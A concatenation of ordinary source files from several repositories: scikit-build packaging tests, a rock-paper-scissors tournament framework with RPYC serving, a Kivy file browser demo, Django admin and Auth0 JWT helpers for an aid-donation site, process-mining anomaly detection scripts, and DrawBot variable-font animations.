assert "skipping skbuild (no CMakeLists.txt found)" in out
# @project_setup_py_test("hello-pure", ["test"])
# def test_hello_cython_works():
# pass
@project_setup_py_test("hello-pure", ["sdist"], disable_languages_test=True)
def test_hello_pure_sdist():
sdists_tar = glob.glob('dist/*.tar.gz')
sdists_zip = glob.glob('dist/*.zip')
assert sdists_tar or sdists_zip
member_list = None
expected_content = None
if sdists_tar:
expected_content = [
'hello-pure-1.2.3',
'hello-pure-1.2.3/hello',
'hello-pure-1.2.3/hello/__init__.py',
'hello-pure-1.2.3/setup.py',
'hello-pure-1.2.3/PKG-INFO'
]
member_list = tarfile.open('dist/hello-pure-1.2.3.tar.gz').getnames()
elif sdists_zip:
expected_content = [
'hello-pure-1.2.3/hello/__init__.py',
'hello-pure-1.2.3/setup.py',
'hello-pure-1.2.3/PKG-INFO'
]
member_list = ZipFile('dist/hello-pure-1.2.3.zip').namelist()
assert expected_content and member_list
assert sorted(expected_content) == sorted(member_list)
@project_setup_py_test("hello-pure", ["bdist_wheel"], disable_languages_test=True)
def test_hello_pure_wheel():
expected_content = [
'hello/__init__.py'
]
expected_distribution_name = 'hello_pure-1.2.3'
whls = glob.glob('dist/*.whl')
assert len(whls) == 1
check_wheel_content(whls[0], expected_distribution_name, expected_content, pure=True)
def test_hello_clean(capfd):
with push_dir():
@project_setup_py_test("hello-pure", ["build"], disable_languages_test=True)
def run_build():
pass
tmp_dir = run_build()[0]
assert tmp_dir.join(SKBUILD_DIR()).exists()
@project_setup_py_test("hello-pure", ["clean"], tmp_dir=tmp_dir, disable_languages_test=True)
def run_clean():
pass
run_clean()
assert not tmp_dir.join(SKBUILD_DIR()).exists()
out = capfd.readouterr()[0]
assert 'Build files have been written to' not in out
``` |
{
"source": "jokvedaras/game-framework",
"score": 4
} |
#### File: game-framework/Players/DWPMPlayer.py
```python
__author__ = '<NAME> and <NAME>'
import Player
import Message
# Move encoding: 0 for rock, 1 for paper, 2 for scissors.
# Past moves are stored as numbers, our move followed by the opponent's move.
# Our strategy looks at all of the opponent's past moves. Over a large number
# of games you would expect each move to appear a roughly equal number of
# times, so we take the least seen move, expect it to show up soon, and play
# the move that beats it.
class DWPMPlayer(Player.Player):
def __init__(self):
Player.Player.__init__(self)
self.past_moves = []
self.set_name("Dan and Pats Player")
def play(self):
return RpsPlayingStrategy.play(self.past_moves)
def add_past_move(self, move):
"""
        Adds the opponent's move to the past-move history.
"""
self.past_moves.append(move)
def get_name(self):
return self.name
def notify(self, message):
# We use notifications to store opponent's moves in past rounds
# Process match-start and round-end messages
# At the start of the match, clear opponent moves history since a new match has started
# At the end of a round, append move to opponent's move history. Move history is used
# to compute the next move played.
if message.is_match_start_message():
players = message.get_players()
if players[0] == self or players[1] == self:
self.reset()
elif message.is_round_end_message():
players = message.get_players()
# Check if this message is for me and only then proceed
if (players[0] == self) or (players[1] == self):
# In this case, (by convention) the info is a tuple of the moves made and result
# e.g. ((1, 0), (1,0)) which
# means player 1 played paper (1), the player 2 played rock(0) and the result was that
# player 1 won (got 1 point) and player 2 lost (got 0 point)
moves, result = message.get_info()
# RPS is a two person game; figure out which of the players is me
# and which one is the opponent
if players[0] == self:
opponent = 1
else:
opponent = 0
# Update opponent's past moves history
self.add_past_move(moves[opponent])
def reset(self):
self.past_moves = []
def set_name(self, name):
self.name = name
class RpsPlayingStrategy(object):
@staticmethod
def play(past_moves):
"""
        Our player assumes that, over a large number of games, the opponent
        uses all three moves roughly equally often. Given the list of
        past_moves, we counter the move the opponent is expected to play next.
"""
rock = 0
paper = 0
scissors = 0
for this_move in list(past_moves):
if this_move == 0:
rock += 1
elif this_move == 1:
paper += 1
elif this_move == 2:
scissors += 1
#determine which move has been used least
if (rock < paper) and (rock < scissors):
move = 0
elif paper < scissors:
move = 1
else:
move = 2
move = (move + 1) % 3
return move
# Test driver
# Run by typing "python3 RpsPlayerExample.py"
if __name__ == "__main__":
    player = DWPMPlayer()
    opponent = DWPMPlayer()
players = [opponent, player]
fakemoves = (1, 2)
fakeresult = (0, 1)
player.notify(Message.Message.get_match_start_message(players))
player.notify(Message.Message.get_round_start_message(players))
move = player.play()
print ("Move played: ", move)
player.notify(Message.Message.get_round_end_message(players, fakemoves, fakeresult))
```
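A small standalone check of the "least seen move" logic described in the comments above; the move history is made up, and the import assumes the Players directory is on the path.
```python
# Made-up history to exercise RpsPlayingStrategy.play; assumes Players/ is importable.
from DWPMPlayer import RpsPlayingStrategy

history = [0, 0, 1, 2, 2]  # opponent: rock twice, paper once, scissors twice
move = RpsPlayingStrategy.play(history)

# Paper (1) is the least seen move, so the strategy expects it next and answers
# with the move that beats it: (1 + 1) % 3 == 2, i.e. scissors.
assert move == 2
```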
#### File: game-framework/Players/GRTCPlayer.py
```python
__author__ = '<NAME>'
__author__ = '<NAME>'
from random import randint
import Player
import Message
class MyPlayer(Player.Player):
def __init__(self):
"""
:param self: this player class
"""
Player.Player.__init__(self) # calls superclass constructor
self.reset()
def play(self):
return RpsPlayingStrategy.play(self.opponents_moves)
def reset(self):
self.opponents_moves = []
def get_name(self):
"""
:param self: this player class
:return name: name of this player
"""
return "Greg & Tara"
def notify(self, msg):
# We use notifications to store opponent's moves in past rounds
# Process match-start and round-end messages
# At the start of the match, clear opponent moves history since a new match has started
# At the end of a round, append move to opponent's move history. Move history is used
# to compute the next move played.
if msg.is_match_start_message():
players = msg.get_players()
if players[0] == self or players[1] == self:
self.reset()
elif msg.is_round_end_message():
players = msg.get_players()
# Check if this message is for me and only then proceed
if (players[0] == self) or (players[1] == self):
# In this case, (by convention) the info is a tuple of the moves made and result
# e.g. ((1, 0), (1,0)) which means player 1 played paper (1), the player 2 played
# rock(0) and the result was that player 1 won (got 1 point) and player 2 lost (got 0 point)
moves, result = msg.get_info()
# RPS is a two person game; figure out which of the players is me
# and which one is the opponent
if players[0] == self:
opponent = 1
else:
opponent = 0
# Update opponent's past moves history
self.opponents_moves.append(moves[opponent])
# An implementation of a simple rps playing strategy
class RpsPlayingStrategy(object):
@staticmethod
def play(opponents_moves):
"""
        Predicts what the opponent might do next and plays accordingly.
        :return next_move: the move that we are going to make
"""
rand = randint(1, 100)
        # Generate a random number so that certain moves are played a set percentage of the time.
if len(opponents_moves) == 0: # if this is going to be the first move made
if 1 <= rand <= 40:
next_move = 0
elif 41 <= rand <= 65:
next_move = 1
else:
next_move = 2
elif len(opponents_moves) == 1: # only one move was made by each player
if opponents_moves[0] == 0:
if rand < 20:
next_move = 0
elif 20 <= rand < 66:
next_move = 1
else:
next_move = 2
elif opponents_moves[0] == 1:
if rand < 20:
next_move = 1
elif 20 <= rand < 66:
next_move = 2
else:
next_move = 0
else:
if rand < 20:
next_move = 2
elif 20 <= rand < 66:
next_move = 0
else:
next_move = 1
else: # more than one move was made by each player
rock_count = 0
paper_count = 0
scissors_count = 0
x = 1
while x < len(opponents_moves): # only take the opponents moves into account
if opponents_moves[x] == 0:
rock_count += 1
elif opponents_moves[x] == 1:
paper_count += 1
else:
scissors_count += 1
x += 2
if rock_count >= 2:
next_move = 2
elif paper_count >= 2:
next_move = 0
elif scissors_count >= 2:
next_move = 1
else:
if rand <= 30:
next_move = 2
elif 30 < rand <= 66:
next_move = 1
else:
next_move = 0
return next_move
# Test driver
# Run by typing "python3 RpsPlayerExample.py"
if __name__ == "__main__":
player = MyPlayer()
opponent = MyPlayer()
players = [opponent, player]
fake_moves = (1, 2)
fake_result = (0, 1)
player.notify(Message.Message.get_match_start_message(players))
player.notify(Message.Message.get_round_start_message(players))
move = player.play()
print("Move played: ", move)
player.notify(Message.Message.get_round_end_message(players, fake_moves, fake_result))
```
#### File: game-framework/srs/Game.py
```python
import Observer
class Game (Observer.Observer):
def num_players_per_game(self):
"""
        Number of players in a game. Defaults to two-player games.
        :return: the number of players required per match
"""
return 2
def get_result(self, moves):
"""
Computes the result for the given moves.
:param moves: A tuple containing the moves made by the players
:return: a tuple containing the result for the players
"""
        # A child of this class will have to figure out how win/loss/tie
        # is determined from the moves.
#
# Don't forget an elimination process if move is illegal
#
# @return array of points given to each player
pass
def is_legal(self, move):
"""
Checks if a given move is legal
:param move: given move
:return: True if the move is legal, false otherwise
"""
pass
```
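`Game` is abstract; below is a minimal rock-paper-scissors subclass written to match the move encoding and result convention used by the players above. It is a sketch, not part of the framework excerpt.
```python
# Hypothetical rock-paper-scissors game; 0 = rock, 1 = paper, 2 = scissors,
# and the result tuple awards 1 point to the winner, as the players assume.
import Game


class RpsGame(Game.Game):
    def get_result(self, moves):
        a, b = moves
        if a == b:
            return (0, 0)  # tie
        if (a - b) % 3 == 1:  # paper > rock, scissors > paper, rock > scissors
            return (1, 0)
        return (0, 1)

    def is_legal(self, move):
        return move in (0, 1, 2)
```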
#### File: game-framework/srs/Observable.py
```python
__author__ = '<NAME>'
#Describes an Observable object.
#includes methods to notify all observers
#and to add/delete them
#class for Observable
class Observable(object):
def __init__(self):
self.observer_list = []
#notify all observers
def notify_all(self, msg):
for obs in self.observer_list:
obs.notify(msg)
#add observer to the list
def add_observer(self, observer):
if observer not in self.observer_list:
self.observer_list.append(observer)
#delete all observers
def delete_all_observers(self):
del self.observer_list[:]
```
#### File: game-framework/srs/Observer.py
```python
__author__ = '<NAME>'
#abstract class for the Observer interface
class Observer(object):
#must be implemented in all subclasses
def notify(self, msg):
pass
```
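A tiny demonstration of the Observable/Observer pair above; the message is just a string here, whereas the framework itself passes Message objects.
```python
# Minimal demonstration; the framework passes Message objects, not strings.
import Observable
import Observer


class PrintingObserver(Observer.Observer):
    def notify(self, msg):
        print("received:", msg)


subject = Observable.Observable()
subject.add_observer(PrintingObserver())
subject.notify_all("round finished")   # -> received: round finished
subject.delete_all_observers()
```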
#### File: game-framework/srs/registration.py
```python
__author__ = '<NAME> and <NAME>'
#purpose of this file is to register a player in a tournament
class Registration:
def __init__(self, tournament):
"""Initialize Registration with a Tournament"""
self.tournament = tournament
    def register(self, player):
        """Register a player in the tournament"""
        # Tournament exposes register_player (see Tournament.py)
        self.tournament.register_player(player)
```
#### File: game-framework/srs/RPYCTournamentService.py
```python
__author__ = '<NAME>'
"""Using RPYC to implement distributed playing on the game-framework"""
import rpyc
from TournamentServer import *
class RPYCTournamentService(rpyc.Service):
def on_connect(self):
"""Called when connection is established"""
print("Connected to server")
def on_disconnect(self):
"""Called when connection is terminated"""
print("Disconnected from server")
def exposed_register_player(self, player):
"""Add a remote player to the tournament"""
print(player.get_name())
tournament_service.register_player(player)
def exposed_set_game(self, game):
"""set the game of the current tournament"""
tournament_service.set_game(game)
def exposed_set_tournament(self, tournament):
"""Allow client to set the tournament type. Defaults to
AllPlayAll tournament type"""
tournament_service.set_tournament(tournament)
def exposed_set_display(self, display):
"""set the current display type of the tournament"""
tournament_service.set_display(display)
def exposed_run(self):
"""Run the current tournament setup"""
tournament_service.run()
def exposed_reset(self):
"""reset the current tournament"""
tournament_service.reset()
# Start the game server
if __name__ == "__main__":
    from rpyc.utils.server import ThreadedServer
    from threading import Thread
    tournament_service = TournamentServer()
    server = ThreadedServer(RPYCTournamentService, port=12345, protocol_config={"allow_public_attrs": True})
server.start()
"""
t = Thread(target = server.start)
t.daemon = True
t.start()
"""
```
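The service above exposes `register_player`, `set_game`, `run` and friends over a ThreadedServer on port 12345; here is a hedged sketch of a client driving it. The host and the player/game classes are placeholders, and rpyc makes the `exposed_*` methods reachable through `conn.root` without the prefix.
```python
# Hypothetical client for the RPYC service above; host, player and game classes
# are placeholders for whatever the tournament actually uses.
import rpyc

conn = rpyc.connect("localhost", 12345, config={"allow_public_attrs": True})

conn.root.register_player(MyPlayer())   # exposed_register_player, minus the prefix
conn.root.set_game(RpsGame())           # exposed_set_game
conn.root.run()                         # exposed_run
conn.close()
```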
#### File: game-framework/srs/Tournament.py
```python
import Message
import Observable
import ScoreKeeper
class Tournament(Observable.Observable):
# set up a list of players when tournament is initialized
def __init__(self):
Observable.Observable.__init__(self)
self.playerList = []
self.game = None
self.display = None
self.scorekeeper = ScoreKeeper.ScoreKeeper()
def attach_display(self, display):
self.display = display
self.add_observer(self.display)
# Returns the players in the tournament
def get_players(self):
return self.playerList
# run the tournament
def run(self):
self.begin_tournament()
while True:
match = self.create_next_match()
if match is None:
break
self.play_match(match)
self.end_tournament()
self.scorekeeper.print_final_stats()
# get a reference to the next game to be played
def create_next_match(self):
pass
# register a player for the tournament by adding them to
# the list of current players
def register_player(self, player):
self.playerList.append(player)
self.add_observer(player)
# stores a reference to the type of game we will be playing
def set_game(self, game):
self.game = game
# Computes the result of a round based on the moves made by the players
def get_result(self, moves):
return self.game.get_result(moves)
# play the next match and return the results
def play_match(self, match):
players = match[0]
self.start_match(players)
result = self.play_rounds(match) # play_rounds should return a value, but doesn't... TODO??
self.end_match(players, result)
# plays each individual game in the match
"""
This function should return a result, but when it does return result,
it stops the match in the preceding play_match function.
This is likely a bug, but I haven't figured out a solution to this.
"""
def play_rounds(self, match):
players = match[0]
rounds = match[1]
for i in range(rounds):
self.start_round(players)
moves = []
for p in players:
moves.append(p.play())
result = self.get_result(moves)
self.end_round(players, moves, result)
# notifies players tournament has begun
def begin_tournament(self):
pass
# Announces results of tournament to all players
def end_tournament(self):
        message = Message.Message.get_tournament_end_message(self.playerList)
self.notify_all(message)
# send a message containing a list of all the players in the current match
def start_match(self, players):
message = Message.Message.get_match_start_message(players)
self.notify_all(message)
# send a message containing the result of the match
def end_match(self, players, result):
message = Message.Message.get_match_end_message(players, result)
self.notify_all(message)
# send a message containing the players in the next game
def start_round(self, players):
message = Message.Message.get_round_start_message(players)
self.notify_all(message)
# send a message containing the players, moves, and result of the last game
def end_round(self, players, moves, result):
#find winner based on the largest score
if(result[0] == result[1]): #if tie, no winner awarded
winner = None
else:
winner = players[result.index(max(result))]
self.scorekeeper.update_tournament(players, winner, result)
message = Message.Message.get_round_end_message(players, moves, result)
self.notify_all(message)
``` |
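The TODO in play_rounds above notes that the method ought to return a result. Below is a minimal variant that returns the final round's result once the loop has finished, assuming that is the value play_match wants to hand to end_match.
```python
# Hedged rewrite of play_rounds; assumes the last round's result is what
# play_match / end_match expect. Returning inside the loop would end the
# match after a single round, which matches the behaviour described in the TODO.
def play_rounds(self, match):
    players, rounds = match
    result = None
    for i in range(rounds):
        self.start_round(players)
        moves = [p.play() for p in players]
        result = self.get_result(moves)
        self.end_round(players, moves, result)
    return result  # only reached after every round has been played
```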
{
"source": "jol79/kivy_tr2",
"score": 3
} |
#### File: jol79/kivy_tr2/text_filechooser.py
```python
from kivy.utils import platform  # kivy's platform string: 'win', 'linux', 'macosx', ...
from kivy.app import App
from os.path import sep, expanduser, isdir, dirname
from kivy.uix.popup import Popup
from kivy_garden.filebrowser import FileBrowser
class UploadBrowser:
    def __init__(self):
        browser = FileBrowser(select_string='Select', cancel_string='Cancel')
        # binding events (FileBrowser dispatches on_success / on_canceled):
        browser.bind(
            on_success=self._fbrowser_success,
            on_canceled=self._fbrowser_canceled
        )
        # popup to hold FileBrowser:
        self.popup = Popup(
            title="choose file",
            content=browser,
            size_hint=(None, None),
            size=(600, 600),
        )

    def _fbrowser_success(self, instance):
        # selection holds the paths picked in the browser
        print(instance.selection)
        self.popup.dismiss()

    def _fbrowser_canceled(self, instance):
        self.popup.dismiss()
class TestApp(App):
def build(self):
# way for windows users:
if platform == 'win':
user_path = dirname(expanduser('~')) + sep + 'Documents'
# for other OS:
else:
user_path = expanduser('~') + sep + 'Documents'
browser = FileBrowser(select_string='Select',
favorites=[(user_path, 'Documents')])
# binding buttons events:
browser.bind(
on_success=self._fbrowser_success,
on_canceled=self._fbrowser_canceled)
return browser
def _fbrowser_canceled(self, instance):
        print('Cancelled, closing file browser.')
    ###
    # If the user successfully selects a file, its path is stored in
    # `selection`, a read-only ListProperty containing the list of
    # currently selected files.
    ###
def _fbrowser_success(self, instance):
print(instance.selection)
TestApp().run()
``` |
{
"source": "joladnijo/joladnijo-backend",
"score": 2
} |
#### File: joladnijo-backend/joladnijo/admin.py
```python
from django.contrib import admin
from django.contrib.gis import admin as gis_admin
from django.urls import reverse
from django.utils.safestring import mark_safe
from simple_history.admin import SimpleHistoryAdmin
from . import models
class ContactInline(admin.StackedInline):
model = models.Contact
fields = (
'name',
'email',
'phone',
'facebook',
'url',
'note',
)
class Meta:
abstract = True
class OrganizationContactInline(ContactInline):
fk_name = 'organization'
class AidCenterContactInline(ContactInline):
fk_name = 'aid_center'
@admin.register(models.Organization)
class OrganizationAdmin(SimpleHistoryAdmin):
list_display = ['name']
fields = (('name', 'slug'), 'description', 'note')
prepopulated_fields = {'slug': ['name']}
inlines = [OrganizationContactInline]
@admin.register(models.AidCenter)
class AidCenterAdmin(gis_admin.GeoModelAdmin, SimpleHistoryAdmin):
list_display = ['name', 'city', 'organization_link']
list_filter = ['organization']
readonly_fields = ['organization_link']
prepopulated_fields = {'slug': ['name']}
default_lat = 47.180116
default_lon = 19.503996
default_zoom = 7
fieldsets = (
(
'Al<NAME>',
{
'fields': (
('name', 'slug'),
'photo',
'organization',
'description',
),
},
),
(
'Helyszín',
{
'fields': (
'country_code',
('postal_code', 'city'),
'address',
'geo_location',
),
},
),
(
'Egyéb',
{
'fields': (
'campaign_ending_on',
'call_required',
'note',
),
},
),
)
inlines = [AidCenterContactInline]
@admin.display(description='Szervezet', ordering='name')
def organization_link(self, obj):
url = reverse('admin:joladnijo_organization_change', args=[obj.organization.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.organization))
@admin.register(models.Contact)
class ContactAdmin(SimpleHistoryAdmin):
list_display = ['name', 'email', 'phone']
list_filter = ['organization', 'aid_center']
fields = (
'name',
'email',
'phone',
'facebook',
'url',
'organization',
'aid_center',
'note',
)
@admin.register(models.AssetCategory)
class AssetCategoryAdmin(admin.ModelAdmin):
list_display = ['name']
fields = (('name', 'icon'),)
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return obj is not None and obj.assettype_set.count() == 0
@admin.register(models.AssetType)
class AssetTypeAdmin(admin.ModelAdmin):
list_display = ['name', 'category_link']
list_filter = ['category']
fields = (
'name',
'category',
)
@admin.display(description='Kategória', ordering='name')
def category_link(self, obj):
url = reverse('admin:joladnijo_assetcategory_change', args=[obj.category.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.category))
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return obj is not None and obj.assetrequest_set.count() == 0
@admin.register(models.AssetRequest)
class AssetRequestAdmin(SimpleHistoryAdmin):
list_display = ['name', 'aid_center_link', 'status']
list_filter = ['type', 'status', 'aid_center']
fields = (
'name',
'type',
'aid_center',
'status',
)
@admin.display(description='Gyűjtőhely', ordering='name')
def aid_center_link(self, obj):
url = reverse('admin:joladnijo_aidcenter_change', args=[obj.aid_center.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.aid_center))
@admin.register(models.FeedItem)
class FeedItemAdmin(admin.ModelAdmin):
list_display = ['timestamp', 'name', 'asset_request_link', 'aid_center_link', 'status_old', 'status_new']
list_filter = ['asset_request', 'aid_center', 'user']
fields = (
('name', 'icon'),
'asset_request',
'aid_center',
'status_old',
'status_new',
'note',
'user',
)
    readonly_fields = ['timestamp']
@admin.display(description='Adomány', ordering='name')
def asset_request_link(self, obj):
if obj.asset_request is None:
return None
url = reverse('admin:joladnijo_assetrequest_change', args=[obj.asset_request.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.asset_request))
@admin.display(description='Gyűjtőhely', ordering='name')
def aid_center_link(self, obj):
url = reverse('admin:joladnijo_aidcenter_change', args=[obj.aid_center.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.aid_center))
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
```
#### File: joladnijo-backend/joladnijo/auth0.py
```python
import json
import os
from functools import wraps
import jwt
import requests
from django.contrib.auth import authenticate
from django.http import JsonResponse
def jwt_decode_token(token):
header = jwt.get_unverified_header(token)
jwks = requests.get(os.environ.get("JWT_KEYS", "")).json()
public_key = None
for jwk in jwks["keys"]:
if jwk["kid"] == header["kid"]:
public_key = jwt.algorithms.RSAAlgorithm.from_jwk(json.dumps(jwk))
if public_key is None:
raise Exception("Public key not found.")
return jwt.decode(
token,
public_key,
audience=os.environ.get("JWT_AUDIENCE", ""),
issuer=os.environ.get("JWT_ISSUER", ""),
algorithms=[os.environ.get("JWT_ALGORITHM", "RS256")],
)
def jwt_get_username_from_payload_handler(payload):
username = payload["sub"].replace("|", ".")
authenticate(remote_user=username)
return username
def get_token_auth_header(request):
"""Obtains the Access Token from the Authorization Header"""
auth = request.META.get("HTTP_AUTHORIZATION")
if not auth:
return None
parts = auth.split()
token = parts[1]
return token
def requires_permission(required_permission):
"""Determines if the required permission is present in the Access Token
Args:
required_permission (str): The permission required to access the resource
"""
def require_permission(f):
@wraps(f)
def decorated(*args, **kwargs):
token = get_token_auth_header(args[0])
if token:
decoded = jwt.decode(token, verify=False)
permissions = decoded.get("permissions")
if permissions:
for permission in permissions:
if permission == required_permission:
return f(*args, **kwargs)
response = JsonResponse({"message": "You don't have access to this resource"})
response.status_code = 403
return response
return decorated
return require_permission
``` |
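A hedged sketch of the `requires_permission` decorator on a Django view; the permission string, view name and import path are placeholders chosen for illustration.
```python
# Hypothetical Django view guarded by the decorator above; the permission
# string and import path are placeholders.
from django.http import JsonResponse

from joladnijo.auth0 import requires_permission


@requires_permission("read:aid_centers")
def aid_center_list(request):
    # only reached when the bearer token carries the read:aid_centers permission
    return JsonResponse({"results": []})
```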
{
"source": "joLahann/dapnn",
"score": 2
} |
#### File: dapnn/dapnn/performance.py
```python
__all__ = ['load_pred_model', 'inference']
# Cell
from .imports import *
from .data_processing import *
from .anomaly import *
# Cell
import warnings
warnings.filterwarnings(action='once')
# Cell
def load_pred_model(learner_path,train_log_path,log_name,cols=['activity']):
log = import_log(train_log_path)
o,dls,categorify = training_dl(log,cat_names=cols)
loss=partial(multi_loss_sum,o)
emb_szs = get_emb_sz(o)
m=MultivariateModel(emb_szs)
learn=Learner(dls, m, path=learner_path, model_dir='.', loss_func=loss, metrics=get_metrics(o))
learn.load(log_name,with_opt=False)
m=learn.model.cuda()
return m, categorify
def inference(test_log_path,m,categorify,log_name,cols=['activity'],fixed_threshold=None,override_threshold_func=None):
if type(test_log_path)==str:
log = import_log(test_log_path)
else:
log = test_log_path
o = process_test(log,categorify,cols)
nsp,idx=predict_next_step(o,m)
score_df=multivariate_anomaly_score(nsp,o,idx,cols)
    if override_threshold_func is not None:
        y_true,y_pred=multivariate_anomalies(score_df,cols,idx,o,get_thresholds=override_threshold_func)
    else:
        y_true,y_pred=multivariate_anomalies(score_df,cols,idx,o,fixed_threshold=fixed_threshold)
nsp_acc= float(nsp_accuracy(o,idx,nsp[0]))
f1 = f1_score(y_true, y_pred)
acc = accuracy_score(y_true, y_pred)
precision = precision_score(y_true,y_pred)
recall = recall_score(y_true,y_pred)
return [log_name, nsp_acc, f1, acc, precision, recall]
```
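A hedged end-to-end use of the two helpers above; every path and the log name are placeholders, and the returned row follows the order built in `inference`.
```python
# Placeholders throughout; only the call shapes mirror the functions above.
m, categorify = load_pred_model(
    learner_path='models/binet_logs',
    train_log_path='data/csv/binet_logs/example_train.csv',
    log_name='example',
)
row = inference('data/csv/binet_logs/example_test.csv', m, categorify, 'example')
# row -> [log_name, next-step accuracy, f1, accuracy, precision, recall]
```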
#### File: dapnn/dapnn/training.py
```python
__all__ = ['train', 'train_pdc20_logs', 'train_pdc21_logs', 'train_binet_logs', 'run_training']
# Cell
from .imports import *
from .data_processing import *
from .anomaly import *
# Cell
import warnings
warnings.filterwarnings(action='once')
# Cell
import fire
# Cell
def train(fn,log_name,store_path='models',epoch=25,ws=5):
cols= get_attr(attr_dict,fn)
log = import_log(fn,cols)
o,dls,categorify = training_dl(log,cols,ws=ws)
p = f'{store_path}/{log_name}_vocab.p'
with open(p, "wb") as output_file:
pickle.dump(categorify, output_file)
emb_szs = get_emb_sz(o)
m=MultivariateModel(emb_szs)
loss=partial(multi_loss_sum,o)
train_val = train_validate(dls,m,loss=loss,metrics=get_metrics(o),epoch=epoch,show_plot=False,print_output=False,store_path=store_path,model_name=log_name)
# Cell
def train_pdc20_logs():
store_path='models/pdc2020'
for training_log in progress_bar(glob.glob('data/csv/PDC2020_training/*')):
log_name = training_log.split('.')[0].split('_')[-1]
train(training_log,log_name,store_path=store_path)
# Cell
def train_pdc21_logs():
store_path='models/pdc2021'
for training_log in progress_bar(glob.glob('data/csv/PDC2021_training/*')):
log_name = training_log.split('.')[0].split('_')[-1]
train(training_log,log_name,store_path=store_path)
# Cell
def train_binet_logs():
store_path='models/binet_logs'
for training_log in progress_bar(glob.glob('data/csv/binet_logs/*')):
log_name = training_log.split('/')[-1][:-7]
train(training_log,log_name,store_path=store_path)
# Cell
def run_training(log="binet"):
if log == 'binet':
train_binet_logs()
elif log == 'pdc20':
train_pdc20_logs()
elif log == 'pdc21':
train_pdc21_logs()
elif log == 'all':
train_pdc20_logs()
train_pdc21_logs()
train_binet_logs()
else:
raise ValueError(f'{log} is not a supported data set!')
``` |
{
"source": "jolancornevin/loving_algorithm",
"score": 2
} |
#### File: loving_algorithm/daily_challenges/daily_template.py
```python
def main():
print "Starting script"
# Insert code here
print "Success !"
if __name__ == "__main__":
main()
``` |
{
"source": "jo-lang/traversing_designspaces",
"score": 2
} |
#### File: traversing_designspaces/2axes_code/area_diff_curves.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
p_w, p_h = 500, 500
margin = 30
dia = 4
steps = 40
txt = 'vfonts'
f_name = 'Skia-Regular'
axes = ['wght', 'wdth']
axis1_min = listFontVariations(f_name)[axes[0]]['minValue']
axis1_max = listFontVariations(f_name)[axes[0]]['maxValue']
axis2_min = listFontVariations(f_name)[axes[1]]['minValue']
axis2_max = listFontVariations(f_name)[axes[1]]['maxValue']
axis_w = p_w - 2 * margin
axis_h = p_h - 2 * margin
# --------------------------
# functions
def a_page():
'''Make a base page with the designspace in the background'''
newPage(p_w,p_h)
fill(1)
rect(0, 0, p_w, p_h)
translate(margin, margin)
fill(.75)
rect(0, 0, axis_w, axis_h)
fill(0)
oval(-dia/2, -dia/2, dia, dia)
oval(-dia/2 + axis_w, -dia/2, dia, dia)
oval(-dia/2, -dia/2 + axis_h, dia, dia)
oval(-dia/2 + axis_w, -dia/2 + axis_h, dia, dia)
fontSize(32)
font(f_name)
var_values = { axes[0] : axis1_min, axes[1] : axis2_min }
fontVariations( **var_values )
text('a', (0, -20), align ='center')
var_values = { axes[0] : axis1_max, axes[1] : axis2_min }
fontVariations( **var_values )
text('a', (axis_w, -20), align ='center')
var_values = { axes[0] : axis1_min, axes[1] : axis2_max }
fontVariations( **var_values )
text('a', (0, axis_h + 8),align ='center')
var_values = { axes[0] : axis1_max, axes[1] : axis2_max }
fontVariations( **var_values )
text('a', (axis_w, axis_h + 8),align ='center')
fontSize(120)
# --------------------------
# Drawings
pts = []
for st in range(steps+1):
a_page()
factor = st/steps
x = ip(axis1_min, axis1_max, factor)
y = lucas(axis2_min, axis2_max, st, (steps+1))
pts.append((factor * axis_w, map_val(y, axis2_min, axis2_max, 0, axis_h)))
for px, py in pts:
fill(1, 0, 0)
oval(px - dia/2, py - dia/2, dia, dia)
fill(0, .9)
var_values = { axes[0] : x, axes[1] : y }
fontVariations(**var_values)
text(txt, (axis_w/2, axis_h/2), align = 'center')
# saveImage('../imgs/%.3d.png' % st)
```
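The scripts import `ip`, `map_val` and `lucas` from a helper_functions module that is not shown. Below are plausible minimal versions of the two interpolation helpers, inferred only from how they are called above; `lucas` is left out because its easing curve cannot be inferred reliably, and the real module may differ.
```python
# Inferred from call sites only; the actual helper_functions module may differ.
def ip(a, b, t):
    """Linear interpolation between a and b for t in 0..1."""
    return a + (b - a) * t


def map_val(value, in_min, in_max, out_min, out_max):
    """Remap value from the range in_min..in_max to out_min..out_max."""
    return out_min + (value - in_min) * (out_max - out_min) / (in_max - in_min)
```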
#### File: traversing_designspaces/2axes_code/area_mintomax.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
p_w, p_h = 300, 300
margin = 30
dia = 4
steps = 40
txt = 'vfonts'
f_name = 'Skia-Regular'
axis_w = p_w - 2 * margin
axis_h = p_h - 2 * margin
axes = ['wght', 'wdth']
# --------
axis1_min = listFontVariations(f_name)[axes[0]]['minValue']
axis1_def = listFontVariations(f_name)[axes[0]]['defaultValue']
axis1_max = listFontVariations(f_name)[axes[0]]['maxValue']
axis2_min = listFontVariations(f_name)[axes[1]]['minValue']
axis2_def = listFontVariations(f_name)[axes[1]]['defaultValue']
axis2_max = listFontVariations(f_name)[axes[1]]['maxValue']
# --------------------------
# functions
def a_page():
newPage(p_w,p_h)
translate(margin, margin)
fill(.75)
rect(0, 0, axis_w, axis_h)
fill(0)
oval(-dia/2, -dia/2, dia, dia)
oval(-dia/2 + axis_w, -dia/2, dia, dia)
oval(-dia/2, -dia/2 + axis_h, dia, dia)
oval(-dia/2 + axis_w, -dia/2 + axis_h, dia, dia)
text('min|min', (0, -12), align ='center')
text('max|min', (axis_w, -12), align ='center')
text('min|max', (0, axis_h + 8),align ='center')
text('max|max', (axis_w, axis_h + 8),align ='center')
font(f_name)
fontSize(80)
# --------------------------
# Drawings
pts = []
for st in range(steps):
a_page()
factor = st/steps
x = ip(axis1_min, axis1_max, factor)
y = ip(axis2_min, axis2_max, factor)
pts.append((factor * axis_w, factor * axis_h))
for px, py in pts:
fill(1, 0, 0)
oval(px - dia/2, py - dia/2, dia, dia)
fill(0, .8)
var_values = { axes[0] : x, axes[1] : y }
fontVariations(**var_values)
text(txt, (axis_w/2, axis_h/2), align = 'center')
```
